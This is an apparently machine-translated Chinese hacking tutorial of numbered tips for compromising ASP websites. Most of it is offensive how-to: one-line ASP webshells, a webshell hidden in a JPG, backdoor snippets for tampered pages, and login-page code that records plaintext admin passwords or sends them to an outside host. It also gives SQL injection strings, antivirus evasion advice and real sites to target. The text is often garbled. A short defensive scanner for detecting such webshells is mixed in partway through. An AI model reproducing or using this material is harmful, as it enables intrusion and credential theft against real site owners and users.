Let you become ASP Trojan Master _ Security Tutorial

Source: Internet
Author: User
1. Name: How to make picture ASP Trojan Horse (can display picture)
Build an ASP file, content for <!--#i nclude file= "Ating.jpg"-->
Find a normal picture ating.jpg, insert a word trojan (such as Ice Fox), with UltraEdit Hex compiled, inserted in the picture, for
Run successfully, but also search <% and%>, turn it into 00, (Do not replace your ASP's), and then add the JPG file to the beginning
<script runat=server Language=javascript>eval (Request.Form (#) +) </SCRIPT>

2. Name: Tricky Internet café
First use the Elite Internet access tool to get user name and password, and then use Computer Management to connect a machine, open telnet, connect, open share,

Copy a Trojan past run can.

3. Name: Feelings MD5 the charm of violent cracking
Rainbowcrack Usage Rtgen Build library first Rtgen MD5 byte 1 7 5 2400 All "
1 and 7 represent the minimum and maximum length of the password
Attin I add a way: http://md5.rednoize.com/online crack
or to Http://www.md5lookup.com/?category=01-3&;searck=on.

4. Many times we do not kill the Trojan, do not understand the assembly, with the Beidou shell program can escape, there are many shell software, we trojan Shell

, it's best to choose an unknown shell-adding software

5. Name: Hidden insert Type ASP Trojan
(1) Add the following content to the ASP file we want to tamper with
<%if Request ("action") = "OK" then%>
The shell code is inserted here, preferably a pony, but also to encrypt the
<%end if%>
When you visit the ASP file with your hands and feet after adding a action=ok, you can
(2) Another method, in our to tamper with the ASP file to add the following content
<%
On Error Resume Next
strFileName = Request.QueryString ("filer")
Set objstream = Server.CreateObject ("Abodb. Stream ")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
Objstream.savetofile Server.MapPath ("ating.asp"), 2
%>
When you visit the ASP file behind the tamper with? filer=xxx
XXX for your local upload of a path such as c:ating123.asp
Ating,asp in the same folder as the ASP that was rigged after uploading
(3) The prerequisite obtains system authority,
Go to the next level of the site Directory
mkdir s ...
Copy ating.asp s.../
So the anti-virus software can not find
Visit http://website/s.../ating.asp can

6. Tool Http://hack520.tengyi.cn/chaojiyonghu.rar, this tool generates a Superuser user name in this computer:

Hack password 110, in DOS and computer Manager can not see the user you created, and is not deleted

7. Name: QQ Group script attack
Open the QQ dialog con, copy the message, and then
The following content is saved as a. vbs file and can be run
Set wshshell= wscript.createobject ("Wscript.Shell")
Wshshell.appactivate "QQ Information attack script"
For I=1 to 20
Wscript.Sleep 1000
Wshshell.sendkeys "^v"
Wshshell.sendkeys I
Wshshell.sendkeys '%s '
Next

8. Search: Program production: Wan Peng have free application space, directly upload ASP horse can

9. Name: Thoroughly finding ASP Trojans on your own site
(1) Scan with anti-virus software.
(2) Use FTP client software: choose "Tools" -> "Compare Folders".
(3) Upload asplist2.0.asp to the site space and view its listing; an ASP file with general-purpose functions is, in my estimate, an ASP Trojan.
(4) Compare with the Beyond Compare tool.
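
The folder comparison and file review in item 9 can be automated. The following is an added example, not part of the original page: it hashes a web root against a known-good baseline and checks only new or changed files for the markers that appear in the snippets on this page (an include of an image file, eval/execute applied to request data, ADODB.Stream file writes, writes of the password field, and directories whose names end in dots). The rule names and function names are assumptions made for illustration.

```python
import hashlib, os, re

# Patterns drawn from the snippets on this page; tune before production use.
RULES = {
    "include-of-image": re.compile(
        r'<!--\s*#\s*include\s+(?:file|virtual)\s*=\s*"[^"]+\.(?:jpe?g|gif|png|bmp)"', re.I),
    "eval-of-request": re.compile(r'\b(?:eval|execute)\s*\(?\s*request\b', re.I),
    "credential-write": re.compile(
        r'(?:createtextfile|writetext)[\s\S]*?request\s*\(\s*"password"\s*\)', re.I),
}
SERVER_SCRIPT = re.compile(r'<script[^>]*\brunat\s*=\s*"?server', re.I)
IMAGE_EXT = (".jpg", ".jpeg", ".gif", ".png", ".bmp")

def scan_text(path, text):
    """Return sorted rule names that fire for one file's path and content."""
    hits = {name for name, rx in RULES.items() if rx.search(text)}
    low = text.lower()
    if "adodb.stream" in low and "savetofile" in low:
        hits.add("stream-file-write")
    # Server-side script markers have no business inside an image file.
    if path.lower().endswith(IMAGE_EXT) and (hits or SERVER_SCRIPT.search(text)):
        hits.add("script-in-image")
    # Directory names ending in dots (item 5(3)); "." and ".." are excluded.
    if any(p.endswith(".") and p.strip(".") for p in re.split(r"[\\/]", path)[:-1]):
        hits.add("dot-suffixed-directory")
    return sorted(hits)

def snapshot(root):
    """Map relative path -> SHA-256 for every file under root."""
    out = {}
    for d, _, files in os.walk(root):
        for f in files:
            full = os.path.join(d, f)
            with open(full, "rb") as fh:
                out[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out

def audit(root, baseline):
    """Report files that are new or changed since baseline, with rule hits."""
    report = {}
    for rel, digest in snapshot(root).items():
        if baseline.get(rel) == digest:
            continue  # unchanged since the known-good snapshot
        with open(os.path.join(root, rel), "rb") as fh:
            text = fh.read().decode("latin-1")  # lossless for binary images
        status = "new" if rel not in baseline else "changed"
        report[rel] = (status, scan_text(rel, text))
    return report
```

Take the baseline with `snapshot()` from a clean deployment and store it off the web server; a changed file with no rule hits still deserves a manual diff.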

10 Name: Expand the mind to take the Dvbbs account "a person's bible" animation
(1) before getting Webshell want to enter the background of Dvbbs, want the administrator password, you can
Old
Modify admin_login.asp get plaintext Dvbbs background password
After the Username=trim (replace request ("username") line
Dim Fsoobject
Dim Tsobject
Set fsoobject = Server.CreateObject ("Scripting.FileSystemObject")
Set tsobject = Fsoobject.createtextfile (Server.MapPath ("Laner.txt"))
Tsobject.write CStr (Request ("password"))
Set fsoobject = Nothing
Set tsobject = Nothing
As long as the administrator log in the background, in the directory generated Laner.txt
(2) Login.asp in the case "Login_chk":
On Error Resume Next
Dim Rain
Set Rain=server.createobject ("ADODB.stream")
Rain. type=2
Rain. charset= "gb2312"
Rain. Position=rain. Size
Rain. Open
Rain. LoadFromFile server. MapPath ("laner.asp")
Rain.writetext now&request ("username") & "Text:" &request ("password") &AMP;CHR (10)
Rain. SaveToFile server. MapPath ("laner.asp"), 2
Rain. Close
Set rain=nothing
So laner.asp will get the login time, username and password of all the landing.
(3) If you have your own website or another Webshell (strongly recommended):
You can create a directory laner that creates an empty laner.asp and a rain.asp of the following code:
<%if request ("n") <> "" and Request ("P") <> "" Then
On Error Resume Next
Dim Rain
Set Rain=server.createobject ("ADODB.stream")
Rain. type=2
Rain. charset= "gb2312"
Rain. Position=rain. Size
Rain. Open
Rain. LoadFromFile server. MapPath ("laner.asp")
Rain.writetext now& "Name:" &request ("n") & "Password:" &request ("P") &AMP;CHR (10)
Rain. SaveToFile server. MapPath ("laner.asp"), 2
Rain. Close
Set rain=nothing
End If%>

11. Name: Use QQ online state to catch pigeon broiler
Generate QQ Online status, change the inside address into a Trojan address, sent to the forum
Insert a sentence in Login.asp:
Response.Write "<scriptsrc=http://www.ptlushi.com/laner/rain.asp?n=" &request ("username")

& "" & "&p=" &request ("password") & "></script>"
Response.Write "<iframesrc=http://yourwebsite/laner/rain.asp?n=" &request ("username")

& "" & "&p=" &request ("password") & "></iframe>"
As a result, all the landings are going to send their names and passwords to your laner.asp.

12. Animation Name: Media China Whole-station program has many loopholes
Vulnerability program: Media China Whole station procedure (first edition)
Official website: http://meiti.elgod.com/
Vulnerability:%5c (Bauku) Upload injection
Upload page: down1/upload.asp

13. Name: Free telephone +msh command line tool
http://www.globe7.com/Open the homepage, click the sit down corner, free DownLoad, download to local, install,
After running, you will be prompted to find the area code for your region. Because it is international long-distance, register an account number, send 100 cents, domestic timing 0.01/, you'll have 100 minutes to play in vain. is an account number OH.
Note that the fixed telephone, PHS form of 0086521123456 521 originally 0521, to omit the preceding 0, mobile phone number is also is the same.

14. Name: Bo-blog's new loophole
http://URL/index.php?job=. /admin/ban
Put "no search word" that part <table> save, the address of the inside to complete, insert a word trojan

15. Name: Hook Soul Intruder
Search legend Inurl:tuku with Baidu
or legendary inurl:wplm.htm.
or the legendary inurl:coolsites.asp.
Links in the link to insert a word trojan can

16. Procedure: HTC Enterprise entire station uploads the flaw
Official homepage: http://www.mu126.com/
Vulnerability page:/cx/upfile.asp (Upload vulnerability)

17. Or=or mailbox, in the password change, username and password add

18. Name: bbsxp5.16 Backstage Get Webshell
bbsxp5.16 filter asp,asp,cdx,cer, extension of the file upload, is in the basic settings added to the upload type is not good, and prohibited

Stop the modification of data backup data name, we can save this page in the local, change source code upload.

19. Name: JHACKJ 2005 Latest Classic Tutorial
Download and see, yes, all major sites have

20. Name: Labor-saving invasion of Korean broiler
In AH D's scan injection point entry, open this: Http://www.google.co.kr/advanced_search?hl=zh-CN
This is the advanced search term, the keyword is casually written. Here I write asp?name= set to show 100 for each page.
The language chooses the Korean language. Search, many SAS.

21. Name: The management system of any internet café cracked
Select the Smart ABC, then VV input, the cursor back two steps, press the DELETE key just entered the two VV delete
Finally press Inter key

22. Name: Crack QQ Space Insert webpage Trojan code
Now Tencent has sealed a lot of QQ space code as before <iframe src= "Trojan address" name= "LCX" width= "0"

height= "0" frameborder= "0" ></iframe> Insert the Trojan code is already sealed.
Break through the Disabled method code as follows:
<div id=di>
Marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\ "

Style=display:none></div>

Finally attached Kara is a OK summary
1. Upload a vulnerability [not much to say]
PS: If you see: Select the file you want to upload [upload] or appear "Please login after use", 80% there are loopholes!
Sometimes uploads are not necessarily successful, because cookies are different. We're going to use Wsockexpert to get cookies. And then upload it in domain.

2. Injection holes [Not much]
PS: MD5 password. Sometimes we are not easy to run out. If this is a [SQL database]. Then we can use the following command:
http://inject url; update admin set password=\ new MD5 password \ Where password=\ old MD5 password \--

[Admin is the table name.]


3. Side note, that is, Cross station.
When we invade a station, this station may be strong and airtight, we can find the site and this station the same server, and then in the use of this Site with the right, sniffing and other methods to invade the site we want to invade. Here is a difficult point, is that some of the server's absolute path through Encryption, it depends on our ability


4. Bauku: The middle of the Level two catalogue/replace%5C
Ey:http://www.ahttc.edu.cn/otherweb/dz/bgs/bigclass.asp?bigclassname= Responsibility Scope &bigclasstype=1
If you can see: \e:ahttc040901otherwebdzdatabaseixuer_studio.asa\ is not a valid path. OK road

The correct spelling of the path name and whether to connect to the server where the file is stored.
This is the database. You can use FlashGet to change to. mdb format when downloading.


5.\or\=\or\ This is a phrase that can be connected to SQL. You can go directly to the background. I collected it. There are also similar:
\or\\=\ "or" a "=" a \) or (\a\=\a ") or (" a "=" a "or 1=1--\ or \a\=\a

6. Social engineering. We all know that. is to guess the solution.
Ey:http://www.neu.edu.cn/waishi/admin
Admin Waishi

7. Write to ASP format database. is a word trojan [<%execute request ("value")%>], commonly used in the message book.
Ey:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp [This is the ASP format database], and then write a word Trojan


8. Source code use: Some sites are used to download the source of the Internet. Some stationmaster is very vegetable. Nothing is changed.
Ey:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
This station uses is: Outstanding alumni, the source code I have been down,
Default database/webshell path: Databaseliangu_data.mdb admin: adm_login.asp passwords and user names are

Admin


9. Default database/webshell Path utilization: A lot of such sites/benefits people webshell others.
/databackup/dvbbs7. Mdb
/bbs/databackup/dvbbs7. Mdb
/bbs/data/dvbbs7. Mdb
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
Tools: Website Hunter digging Chicken
Ey:http://www.cl1999.com/bbs/databackup/dvbbs7.mdb

10. View the table of contents method: Some people can disconnect the directory, you can ask the directory.
ey:http://www.ujs168.com/shop/admin/
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
So we can find the database, download I don't have to teach it

11. Tool overflow:. asp? Newsid=/2j.asp?id=18. asp?id=[This method can make a lot of Webshell]

12. Search Engine Utilization:

(1). inurl:flasher_list.asp default database: Database/flash.mdb background/manager/
(2). Look for the admin background address of the website:
Site:xxxx.comintext: Management
Site:xxxx.comintitle: Management < Keywords a lot, self find >
Site:xxxx.cominurl:login
(3). Find the database for access, MSSQL, MySQL connection files
Allinurl:bbsdata
Filetype:mdbinurl:database
Filetype:incconn
Inurl:datafiletype:mdb
My lord won't do it. Do it yourself.

13.COOKIE Spoofing: Change your ID to admin's, MD5 password is also changed to his, with the Guilin Veterans tool can modify cookies.

I'm not going to tell you that.


14. Use common vulnerabilities: such as moving the network BBS
Ey:http://js1011.com/bbs/index.asp
You can use: Dvbbs privilege Promotion tool to make yourself a front desk administrator.
THEN, use: Move net headspace stick tool, find a headspace paste, obtain cookies again, this wants you to do yourself. We can use Wsockexpert.

Get COOKIES/NC Bag
I will not do this, the online tutorial is more, since the next look.
Tools: Dvbbs Privilege lifting tool headspace stick tool

15. There are still some old loopholes. such as iis3,4 view Source, 5 Delete
Cgi,php some of the old holes, I will not say ah ... It's too old. There is no big use.